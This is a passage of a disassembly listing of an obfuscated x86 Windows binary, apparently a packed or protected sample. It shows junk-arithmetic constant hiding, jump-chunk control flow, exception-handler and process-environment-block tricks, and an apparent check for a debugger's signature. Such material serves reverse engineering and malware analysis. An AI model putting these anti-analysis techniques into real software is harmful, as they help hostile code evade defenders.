; FUNCTION CHUNK AT 00427309 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004274E3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042756D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427A9C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00427AEC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042810B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428155 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00428183 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428547 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004286D9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004287FD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428883 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004288D7 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00428A81 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00428D78 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00428E77 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428F67 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428FC1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00429013 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004291CC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429470 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042974E SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004298F2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042994B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004299F7 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00429ABB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429AF9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429BAF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429D0B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429D23 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00429D98 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00429DED SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042A059 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042A1F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A22E SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042A5C1 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042A5D2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A62D SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042A79B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042A7D0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042A942 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AA24 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AA7B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042ABE9 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042AEED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AFDF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B1C1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B264 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B368 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042B45A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042B4BF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042B543 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B5A1 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042B7C0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B8CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C1F5 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042C36B SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042C514 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042C5C5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C7AE SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042CAF0 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042CBE6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042D00A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042D35C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042D6EC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D90E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042DA48 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042DAC7 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 0042DF54 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042E4E2 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042E67D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042E6FA SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0042E72C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042EBD0 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0042EC62 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EC8D SIZE 00000005 BYTES
mov [esp+0], ecx
pop ecx
mov edx, [ebp+8]
loc_427996: ; CODE XREF: sub_428EB9+2D1�j
or [edx-8], eax
jmp loc_427A8A
; ---------------------------------------------------------------------------
loc_42799E: ; DATA XREF: sub_4272F4+6AD1�o
push 0
push offset loc_4291D6
jmp nullsub_234
; ---------------------------------------------------------------------------
loc_4279AA: ; CODE XREF: sub_42DA65:loc_426D5B�j
or ecx, edi
jmp loc_423C61
; ---------------------------------------------------------------------------
loc_4279B1: ; CODE XREF: sub_42966F+38F9�j
call sub_423FCD
test al, al
jz nullsub_34
jmp loc_42B1C1
; ---------------------------------------------------------------------------
loc_4279C3: ; CODE XREF: sub_42DC1F:loc_4275B8�j
mov esp, ebp
pop ebp
mov eax, ds:dword_427A34
or eax, eax
jnz loc_4269C7
call sub_428D17
mov edx, 0B9726E5Ah
call sub_42D71D
jmp loc_42AA24
; ---------------------------------------------------------------------------
loc_4279E8: ; CODE XREF: _0182ofla:0042D79A�j
xor esi, 793E5EF2h
loc_4279EE: ; DATA XREF: sub_42B669-6CD4�o
pop dword ptr fs:0
xchg eax, [esp+0]
pop eax
test al, al
jmp loc_425B22
; ---------------------------------------------------------------------------
db 0AFh
byte_427A00 db 1 ; DATA XREF: sub_4247FE+C�r
; sub_42926C+3�r ...
; ---------------------------------------------------------------------------
loc_427A01: ; CODE XREF: sub_427F32+457�j
jmp loc_42A5C1
; ---------------------------------------------------------------------------
dw 9697h
dword_427A08 dd 0D864A3CDh, 0B1918BD8h, 0C057008Dh ; DATA XREF: sub_4247FE+188A�o
; sub_42926C+13�o
dword_427A14 dd 77F50000h ; DATA XREF: sub_4247FE:loc_4260AA�r
; sub_4247FE+5F46�w
; ---------------------------------------------------------------------------
loc_427A18: ; CODE XREF: sub_42EAF0+9�j
jmp loc_42B4BF
; ---------------------------------------------------------------------------
db 12h, 2Ah, 0E3h
dword_427A20 dd 0 ; DATA XREF: sub_423A2A:loc_426F8C�w
; sub_42DBF0:loc_427EBE�r ...
dword_427A24 dd 77E79F93h ; DATA XREF: _0182ofla:00423E37�w
; sub_423A2A+415�r ...
; ---------------------------------------------------------------------------
loc_427A28: ; CODE XREF: sub_429D83-334B�j
jmp nullsub_35
; ---------------------------------------------------------------------------
loc_427A2D: ; CODE XREF: sub_42662C:loc_423F35�j
jmp loc_42CAF0
; ---------------------------------------------------------------------------
dw 4D8Ah
dword_427A34 dd 0 ; DATA XREF: sub_425A93+6�r
; sub_42798F:loc_4269C0�w ...
; ---------------------------------------------------------------------------
loc_427A38: ; CODE XREF: sub_42A364+14�j
jmp loc_425C6E
; ---------------------------------------------------------------------------
loc_427A3D: ; CODE XREF: sub_4265C0:loc_424438�j
jmp sub_4286A8
; ---------------------------------------------------------------------------
dw 0D701h
dword_427A44 dd 0 ; DATA XREF: sub_4243F2+4�r
; sub_42AAE0-36E0�w ...
; ---------------------------------------------------------------------------
loc_427A48: ; CODE XREF: sub_428D17:loc_428D28�j
jmp loc_42974E
; ---------------------------------------------------------------------------
loc_427A4D: ; CODE XREF: sub_424EBE+F�j
jmp loc_42A79B
; ---------------------------------------------------------------------------
dw 9E7Ch
dword_427A54 dd 1477E71Bh ; DATA XREF: sub_4255E9+5EE1�r
; ---------------------------------------------------------------------------
loc_427A58: ; CODE XREF: sub_425BF8:loc_424816�j
; sub_425A93+F37�j
push eax
call sub_424CD8
retn
; ---------------------------------------------------------------------------
locret_427A5F: ; CODE XREF: sub_42966F+A�j
retn
; ---------------------------------------------------------------------------
loc_427A60: ; CODE XREF: sub_42CA29-1974�j
mov eax, [ebp-0Ch]
jmp loc_42DF54
; ---------------------------------------------------------------------------
loc_427A68: ; CODE XREF: sub_424BCB+9008�j
xchg edi, ecx
jo loc_42A92B
jmp loc_4299F7
; ---------------------------------------------------------------------------
loc_427A75: ; CODE XREF: sub_42D056+814�j
sub ecx, edi
jl loc_4255AA
mov esi, [edi]
jmp loc_42564E
; ---------------------------------------------------------------------------
locret_427A84: ; CODE XREF: _0182ofla:0042D0FD�j
retn
; ---------------------------------------------------------------------------
loc_427A85: ; CODE XREF: sub_429AE0-4AB1�j
call sub_4253F4
loc_427A8A: ; CODE XREF: sub_42798F+A�j
jmp loc_428363
sub_42798F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_427A8F: ; CODE XREF: sub_425B6E:loc_428558�j
mov eax, [ebp+arg_0]
call sub_428EB9
loc_427A97: ; CODE XREF: sub_42798F+38DB�j
jmp loc_4232F5
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_427A9C: ; CODE XREF: sub_42798F-1CF8�j
popf
push 27BFD696h
loc_427AA2: ; CODE XREF: sub_42798F:loc_4286D9�j
lea eax, [ebp-25Ch]
cmp dword ptr [eax], 4742444Fh
jz loc_42595F
jmp loc_42B543
; END OF FUNCTION CHUNK FOR sub_42798F
; =============== S U B R O U T I N E =======================================
sub_427AB9 proc near ; DATA XREF: _0182ofla:00428001�o
; FUNCTION CHUNK AT 00424096 SIZE 0000000D BYTES
push 8348A74Ah
pop edx
add edx, 4AE7BBA2h
push ecx
pushf
push 692737EFh
pop ecx
rol ecx, 10h
jmp loc_424096
sub_427AB9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_427AD5 proc near ; CODE XREF: sub_42430D:loc_42308B�j
; sub_42794C+6�p
; FUNCTION CHUNK AT 00425FEF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042637B SIZE 0000000F BYTES
jnb loc_425FEF
push offset sub_42448C
jmp nullsub_37
sub_427AD5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E97E
loc_427AE5: ; CODE XREF: sub_42E97E+15�j
mov [ebx], eax
pop ebx
cmp dword ptr [ebp-4], 0
; END OF FUNCTION CHUNK FOR sub_42E97E
; START OF FUNCTION CHUNK FOR sub_42798F
loc_427AEC: ; CODE XREF: sub_42798F+613F�j
jz loc_426069
push 0
call sub_423127
; END OF FUNCTION CHUNK FOR sub_42798F
; START OF FUNCTION CHUNK FOR sub_423395
loc_427AF9: ; CODE XREF: sub_423395+A07A�j
jmp loc_42432B
; END OF FUNCTION CHUNK FOR sub_423395
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42380D
loc_427AFE: ; CODE XREF: sub_42380D+7006�j
xor eax, eax
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_42380D
; =============== S U B R O U T I N E =======================================
sub_427B02 proc near ; CODE XREF: sub_428F46:loc_4261B0�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00424307 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042573A SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00425E75 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004263DA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042866D SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042EA80 SIZE 0000000E BYTES
push dword ptr fs:0
mov fs:0, esp
jmp loc_425E75
sub_427B02 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E6E
loc_427B13: ; CODE XREF: sub_424E6E+351�j
jz loc_427F9A
jmp loc_428F3C
; END OF FUNCTION CHUNK FOR sub_424E6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_427B1E: ; CODE XREF: sub_423A2A+158E�j
pushf
push 16A59E2Ch
pop ebx
or ebx, 0BDD52D98h
test ebx, 4000000h
jmp loc_423515
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
dw 0CEC1h
dd 3D8A0F12h, 0E9000057h, 531Ch
; ---------------------------------------------------------------------------
loc_427B44: ; DATA XREF: sub_424707+2250�o
pop edx
pop ebp
jmp loc_428482
; [00000005 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
dd 64E44330h, 8D10274h, 9F3E9B1Ch, 355C3A39h, 8A8943BDh
dd 7884606h, 75DB0147h, 831E8B07h, 0DB11FCEEh, 0EB72078Ah
dd 1B8h, 75DB0100h, 831E8B07h, 0DB11FCEEh, 0DB01C011h
dd 0E2751573h, 0EE831E8Bh
; ---------------------------------------------------------------------------
cld
; START OF FUNCTION CHUNK FOR sub_42ECAD
loc_427B95: ; CODE XREF: sub_42ECAD-538C�j
jmp nullsub_194
; END OF FUNCTION CHUNK FOR sub_42ECAD
; ---------------------------------------------------------------------------
loc_427B9A: ; CODE XREF: _0182ofla:0042C853�j
or edx, 3F28237Ch
; =============== S U B R O U T I N E =======================================
sub_427BA0 proc near ; CODE XREF: sub_423A2A+4ADC�p
xchg ebx, [esp+0]
pop ebx
call sub_42B14D
lea eax, [ebp-14h]
call sub_42A5FC
locret_427BB1: ; CODE XREF: sub_427797-511�j
retn
sub_427BA0 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_146. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AC07
loc_427BB3: ; CODE XREF: sub_42AC07-647B�j
jnz loc_42C5E8
loc_427BB9: ; CODE XREF: sub_42AC07:loc_423095�j
call sub_428D17
call sub_42B8A3
loc_427BC3: ; CODE XREF: sub_423A2A:loc_42A39C�j
sub eax, 91A5D047h
adc ebx, 0A32EE0C5h
jmp loc_424FA8
; END OF FUNCTION CHUNK FOR sub_42AC07
; ---------------------------------------------------------------------------
xchg edi, ebp
jmp sub_42940E
; ---------------------------------------------------------------------------
loc_427BDB: ; DATA XREF: _0182ofla:0042C21A�o
xor edx, edx
div ecx
mov [ebp-18h], edx
push 1A747C22h
pop eax
sub eax, 0D98208Ah
xor eax, 0B88ADBD6h
add eax, ebp
jmp loc_42D309
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42940E
loc_427BFB: ; CODE XREF: sub_42940E-2760�j
push edi
add ecx, 249A9808h
loc_427C02: ; CODE XREF: sub_42940E:loc_42CE32�j
call sub_428D17
mov edx, 0D504D785h
call sub_42D71D
push eax
jmp loc_4243CE
; END OF FUNCTION CHUNK FOR sub_42940E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_427C17: ; CODE XREF: sub_428EB9:loc_423E10�j
or [edx-8], eax
loc_427C1A: ; CODE XREF: sub_4299D4+F�j
; sub_428EB9+B33�j ...
jnb loc_42D919
cmp dword ptr [ebp-14h], 4
jnz loc_428363
mov eax, [ebp+8]
or dword ptr [eax-8], 4
call sub_42D553
loc_427C36: ; CODE XREF: sub_429E52-5021�j
mov [ecx], eax
add ecx, 4
mov [ecx], eax
add ecx, 4
mov [ecx], eax
jmp loc_4250BE
; END OF FUNCTION CHUNK FOR sub_428EB9
; =============== S U B R O U T I N E =======================================
sub_427C4D proc near ; CODE XREF: _0182ofla:00423FAB�j
; _0182ofla:0042DE0B�p
mov [esp+0], edi
pop edi
xor eax, eax
mov [ebp-8], eax
sub_427C4D endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42CC59
loc_427C56: ; CODE XREF: sub_42CC59-348D�j
; sub_424184+8DC5�j
call sub_42CC59
loc_427C5B: ; CODE XREF: sub_42C1B2+278F�j
push offset loc_4288A9
jmp loc_425D04
; END OF FUNCTION CHUNK FOR sub_42CC59
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B669
loc_427C65: ; CODE XREF: sub_42B669-71A1�j
push esi
xor edi, 0A58E4162h
jmp loc_428B8A
; END OF FUNCTION CHUNK FOR sub_42B669
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425629
loc_427C71: ; CODE XREF: sub_425629:loc_42B565�j
rol edx, 1
test edx, 400000h
jmp loc_42C59D
; END OF FUNCTION CHUNK FOR sub_425629
; ---------------------------------------------------------------------------
loc_427C7E: ; CODE XREF: _0182ofla:0042704F�j
jb loc_426AB3
mov [ebp+0], edi
loc_427C87: ; CODE XREF: _0182ofla:loc_423832�j
add edx, 0F6B13E4Ah
call sub_4266D1
loc_427C92: ; CODE XREF: _0182ofla:0042B5F6�j
jmp loc_42DA76
; ---------------------------------------------------------------------------
loc_427C97: ; CODE XREF: _0182ofla:0042E8AB�j
js loc_423D92
; =============== S U B R O U T I N E =======================================
sub_427C9D proc near ; CODE XREF: sub_424184+6�p
mov [esp+0], edx
pop edx
pop edx
retn
sub_427C9D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C379
loc_427CA3: ; CODE XREF: sub_42C379:loc_42D3CE�j
; sub_42D897+8�j
rol eax, 7
push eax
push ebx
jmp loc_42B3FF
; END OF FUNCTION CHUNK FOR sub_42C379
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_33. PRESS KEYPAD "+" TO EXPAND]
db 0E9h ; é
db 1Dh
db 64h ; d
db 0
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424072
loc_427CB3: ; CODE XREF: sub_424072+2B57�j
jmp loc_42EA3B
; END OF FUNCTION CHUNK FOR sub_424072
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4296F0
loc_427CB8: ; CODE XREF: sub_4296F0+6�j
; sub_4296F0+19�j
push offset loc_428E87
jmp nullsub_55
; END OF FUNCTION CHUNK FOR sub_4296F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E376
loc_427CC2: ; CODE XREF: sub_42E376:loc_42EA42�j
mov ebp, offset sub_427CD0
xchg ebp, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_42E376
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_427CCB: ; CODE XREF: sub_4253F4-1D44�j
jmp loc_42E6E8
; END OF FUNCTION CHUNK FOR sub_4253F4
; =============== S U B R O U T I N E =======================================
sub_427CD0 proc near ; DATA XREF: sub_42E376:loc_427CC2�o
; FUNCTION CHUNK AT 004272B9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AEDC SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042CB80 SIZE 00000005 BYTES
push 32199041h
pop eax
rol eax, 1Bh
jmp loc_42CB80
sub_427CD0 endp
; =============== S U B R O U T I N E =======================================
sub_427CDE proc near ; CODE XREF: sub_425DA5+11�p
; FUNCTION CHUNK AT 00423583 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004272A6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EC76 SIZE 0000000B BYTES
xchg ecx, [esp+0]
mov ecx, [esp+0]
mov esp, ebp
pop ebp
mov eax, ds:dword_424C04
or eax, eax
jnz loc_423583
loc_427CF5: ; CODE XREF: _0182ofla:004234F6�j
jmp loc_4272A6
sub_427CDE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A915
loc_427CFA: ; CODE XREF: sub_42A915:loc_42A926�j
jnz loc_42CC1F
jmp loc_429FA8
; END OF FUNCTION CHUNK FOR sub_42A915
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42461C
loc_427D05: ; CODE XREF: sub_42461C:loc_42B4F4�j
jz loc_4251C6
jmp loc_423D92
; END OF FUNCTION CHUNK FOR sub_42461C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427ED1
loc_427D10: ; CODE XREF: sub_427ED1+83C�j
mov [esi], ecx
jmp loc_42D5E1
; END OF FUNCTION CHUNK FOR sub_427ED1
; =============== S U B R O U T I N E =======================================
sub_427D17 proc near ; DATA XREF: sub_428D2D+1E�o
ror eax, 0Ah
mov ds:dword_42D230, eax
retn
sub_427D17 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_427D21: ; CODE XREF: sub_42D056-49DA�j
jmp loc_426678
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D2D
loc_427D26: ; CODE XREF: sub_428D2D+8�j
rol eax, 0Ah
push eax
locret_427D2A: ; CODE XREF: _0182ofla:loc_4256A0�j
retn
; END OF FUNCTION CHUNK FOR sub_428D2D
; =============== S U B R O U T I N E =======================================
sub_427D2B proc near ; CODE XREF: sub_427EAF+A�p
; _0182ofla:0042B4E3�j
xchg eax, [esp+0]
pop eax
inc dword ptr [ebp-0Ch]
push offset loc_42DF09
jmp loc_42D1DB
sub_427D2B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42938A
loc_427D3C: ; CODE XREF: sub_42938A:loc_4242D3�j
jnz loc_426BFD
jmp loc_427123
; END OF FUNCTION CHUNK FOR sub_42938A
; =============== S U B R O U T I N E =======================================
sub_427D47 proc near ; CODE XREF: _0182ofla:00424702�j
; sub_428781+D�p
xchg edx, [esp+0]
pop edx
mov [ebp-24h], eax
mov dword ptr [ebp-18h], 0
sub_427D47 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_428A39
loc_427D55: ; CODE XREF: sub_428A39-4CDA�j
call sub_42768C
jb loc_42ECD1
jmp loc_424612
; END OF FUNCTION CHUNK FOR sub_428A39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423395
loc_427D65: ; CODE XREF: sub_423395+90C1�j
jb loc_42ABDF
loc_427D6B: ; CODE XREF: sub_423395:loc_42D409�j
push 0
push offset loc_42DB03
jmp loc_427DF5
; END OF FUNCTION CHUNK FOR sub_423395
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42719D
loc_427D77: ; CODE XREF: sub_42719D:loc_425D46�j
mov dword ptr [ecx], 10001h
call sub_423726
loc_427D82: ; CODE XREF: _0182ofla:00423C93�j
push eax
push esi
call sub_42E1C8
; END OF FUNCTION CHUNK FOR sub_42719D
; =============== S U B R O U T I N E =======================================
sub_427D89 proc near ; CODE XREF: sub_42310C+B96F�p
mov [esp+0], eax
push esi
push 20179DB9h
pop esi
sub esi, 32D256A4h
add esi, 12FD4C51h
push offset sub_42D03E
jmp nullsub_38
sub_427D89 endp
; =============== S U B R O U T I N E =======================================
sub_427DA9 proc near ; DATA XREF: sub_42A181:loc_429930�o
; FUNCTION CHUNK AT 00423B7B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042848C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00428B74 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042942C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004295FF SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004298B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A326 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042B5BA SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042C656 SIZE 00000012 BYTES
mov eax, large fs:30h
push ecx
push 6361AC3h
pop ecx
and ecx, 0ADE99D5Fh
add ecx, 0FBDFE7DDh
add eax, ecx
pop ecx
jmp loc_42C656
sub_427DA9 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_116. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CA29
loc_427DCC: ; CODE XREF: sub_42CA29-26D9�j
jmp loc_42A1BA
; END OF FUNCTION CHUNK FOR sub_42CA29
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231F3
loc_427DD1: ; CODE XREF: sub_4231F3+1752�j
mov esi, 39012B30h
sub eax, ebp
loc_427DD8: ; DATA XREF: sub_428EB9+5702�o
pop dword ptr fs:0
xchg eax, [esp-4+arg_0]
pop eax
push 262467F8h
mov [esp-4+arg_0], edi
push 637B708Ch
jmp loc_426DDC
; END OF FUNCTION CHUNK FOR sub_4231F3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_80. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423395
loc_427DF5: ; CODE XREF: sub_423395+49DD�j
jmp nullsub_139
; END OF FUNCTION CHUNK FOR sub_423395
; =============== S U B R O U T I N E =======================================
sub_427DFA proc near ; DATA XREF: sub_426BCE+2�o
; FUNCTION CHUNK AT 00423BA4 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00424C7A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426621 SIZE 0000000B BYTES
push 8062C6Dh
pop edx
rol edx, 11h
xor edx, 85B94602h
jmp loc_423BA4
sub_427DFA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_427E0E: ; CODE XREF: sub_42660C-3600�j
jge loc_42543A
push edx
shr esi, 14h
not esi
loc_427E1A: ; CODE XREF: sub_4255E9:loc_42D5D6�j
call sub_428D17
jmp loc_427378
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429A64
loc_427E24: ; CODE XREF: sub_4258F5+347�j
; sub_429A64+E�j
xor eax, eax
push offset loc_426DA3
jmp loc_42B3BD
; END OF FUNCTION CHUNK FOR sub_429A64
; ---------------------------------------------------------------------------
loc_427E30: ; CODE XREF: _0182ofla:0042B513�j
xchg ebx, [edi]
; =============== S U B R O U T I N E =======================================
sub_427E32 proc near ; CODE XREF: sub_428D63:loc_42673D�p
; FUNCTION CHUNK AT 0042B2AA SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
shl al, cl
push offset loc_42B708
jmp loc_42B2AA
sub_427E32 endp
; =============== S U B R O U T I N E =======================================
sub_427E42 proc near ; DATA XREF: sub_42A4C6+2B02�o
; FUNCTION CHUNK AT 00423C20 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00425A32 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042970E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042B5FB SIZE 00000020 BYTES
xchg edi, [esp+0]
pushf
push 9358A972h
pop eax
sub eax, 0B2982085h
jmp loc_42970E
sub_427E42 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
add edx, edi
mov ecx, esi
jmp sub_42E841
; ---------------------------------------------------------------------------
push 4FB34FD9h
jmp sub_42A260
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C906
loc_427E6A: ; CODE XREF: sub_42C906+2400�j
adc ebx, esi
pop edi
loc_427E6D: ; CODE XREF: sub_42C906:loc_423DC6�j
mov eax, 62h
call sub_4265C0
push offset loc_427FB4
jmp nullsub_104
; END OF FUNCTION CHUNK FOR sub_42C906
; =============== S U B R O U T I N E =======================================
sub_427E81 proc near ; CODE XREF: sub_423D2D:loc_4261F2�p
; _0182ofla:0042B208�j
; FUNCTION CHUNK AT 0042B48B SIZE 00000005 BYTES
mov [esp+0], eax
pop eax
pop edi
push offset loc_427698
jmp loc_42B48B
sub_427E81 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_427E90 proc near ; DATA XREF: sub_42E7E3+D�o
; FUNCTION CHUNK AT 0042A1A6 SIZE 00000005 BYTES
xchg eax, ecx
push 796190CAh
pop eax
sub eax, 3D3627BDh
loc_427E9E: ; CODE XREF: _0182ofla:0042A974�j
xor eax, 8FB33E01h
jmp loc_42A1A6
sub_427E90 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E585
loc_427EA9: ; CODE XREF: sub_42E585-AF25�j
popf
loc_427EAA: ; CODE XREF: sub_42798F+1688�j
jmp loc_42EBD0
; END OF FUNCTION CHUNK FOR sub_42E585
; =============== S U B R O U T I N E =======================================
sub_427EAF proc near ; CODE XREF: sub_427967:loc_423D78�p
; _0182ofla:0042962D�j
xchg edx, [esp+0]
pop edx
add eax, 28h
mov [ebp-4], eax
call sub_427D2B
sub_427EAF endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42DBF0
loc_427EBE: ; CODE XREF: sub_42DBF0:loc_42680D�j
mov eax, ds:dword_427A20
mov eax, [eax]
mov ds:dword_427A24, eax
xor eax, eax
jmp loc_428D9D
; END OF FUNCTION CHUNK FOR sub_42DBF0
; =============== S U B R O U T I N E =======================================
sub_427ED1 proc near ; DATA XREF: _0182ofla:004245C0�o
; FUNCTION CHUNK AT 00424503 SIZE 00000005 BYTES
